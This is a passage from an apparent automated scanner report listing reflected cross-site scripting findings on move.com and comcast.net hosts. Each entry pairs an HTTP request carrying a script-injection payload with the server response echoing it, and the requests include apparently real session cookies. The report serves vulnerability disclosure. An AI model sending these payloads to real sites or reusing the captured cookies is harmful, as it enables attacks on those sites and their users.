<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eee0f--><script>alert(1)</script>09637d22ded=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eee0f-->
...[SNIP]...

2.83. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-88/city-brunswick

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eceb9--><script>alert(1)</script>5ed8962a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-88/city-brunswick?eceb9--><script>alert(1)</script>5ed8962a388=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=vjatx5uqlqfsm355x5tuse55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:52 GMT; path=/
Set-Cookie: Personal8549=market=88&state=GA&searchtext=brunswick; expires=Mon, 19-Dec-2011 18:22:52 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 70159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eceb9--><script>alert(1)</script>5ed8962a388=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eceb9-->
...[SNIP]...

2.84. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-88/city-brunswick

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f3d6"><script>alert(1)</script>bb971aa3775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-88/city-brunswick?8f3d6"><script>alert(1)</script>bb971aa3775=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=zb5gvi55pvzzqgnbdz4mxxal; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=88&state=GA&searchtext=brunswick; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 70160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?8f3d6"><script>alert(1)</script>bb971aa3775=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?8f3d6">
...[SNIP]...

2.85. http://newhomesresource.move.com/home/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomesresource.move.com
Path:   /home/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bccb"><script>alert(1)</script>564fcb63a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/default.asp?2bccb"><script>alert(1)</script>564fcb63a16=1 HTTP/1.1
Host: newhomesresource.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:59 GMT
X-Powered-By: ASP.NET
Content-Length: 6887
Content-Type: text/html
Expires: Sun, 12 Dec 2010 19:33:59 GMT
Set-Cookie: Resource=FirstURL=%2Fhome%2Fdefault%2Easp%3F2bccb%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E564fcb63a16%3D1; path=/
Set-Cookie: ASPSESSIONIDCAADCABR=JFBKCHGCKMIDKNMBIEIOHBPM; path=/
Cache-control: private


           <td width="100%" valign="top">

<html>
<head>
   <title>Move</title>
   <link rel="stylesheet" href="../css/global.css" type="text/css">
   <link rel="stylesheet" href="../css/listings.css" type=
...[SNIP]...
<input type="HIDDEN" name="LoginSource" value="/home/default.asp?2bccb"><script>alert(1)</script>564fcb63a16=1">
...[SNIP]...

2.86. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db79e"><script>alert(1)</script>59b0b45d706 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.netdb79e"><script>alert(1)</script>59b0b45d706/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.netdb79e"><script>alert(1)</script>59b0b45d706/home/L16/2106404168/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.87. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16474"><script>alert(1)</script>d5ba4c93f37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home16474"><script>alert(1)</script>d5ba4c93f37/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home16474"><script>alert(1)</script>d5ba4c93f37/L16/1495288859/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.88. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f84a0"><script>alert(1)</script>ca5da6eb0ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16f84a0"><script>alert(1)</script>ca5da6eb0ab/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 645
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16f84a0"><script>alert(1)</script>ca5da6eb0ab/L/481562361/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.89. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986 was submitted in the REST URL parameter 8. This input was echoed as d3a82"><img src=a onerror=alert(1)>ac347692986 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 647
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1228415634/x37d3a82"><img src=a onerror=alert(1)>ac347692986/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.90. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1da"><script>alert(1)</script>7f1b0dd1ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?5e1da"><script>alert(1)</script>7f1b0dd1ebc=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
tral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1777652602/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&5e1da"><script>alert(1)</script>7f1b0dd1ebc=1" WIDTH=2 HEIGHT=2>

2.91. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525df"><script>alert(1)</script>294ed56285c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net525df"><script>alert(1)</script>294ed56285c/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 643
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net525df"><script>alert(1)</script>294ed56285c/home/L16/372205504/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.92. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590c0"><script>alert(1)</script>dcd9f109404 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home590c0"><script>alert(1)</script>dcd9f109404/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home590c0"><script>alert(1)</script>dcd9f109404/L16/1670793816/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.93. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
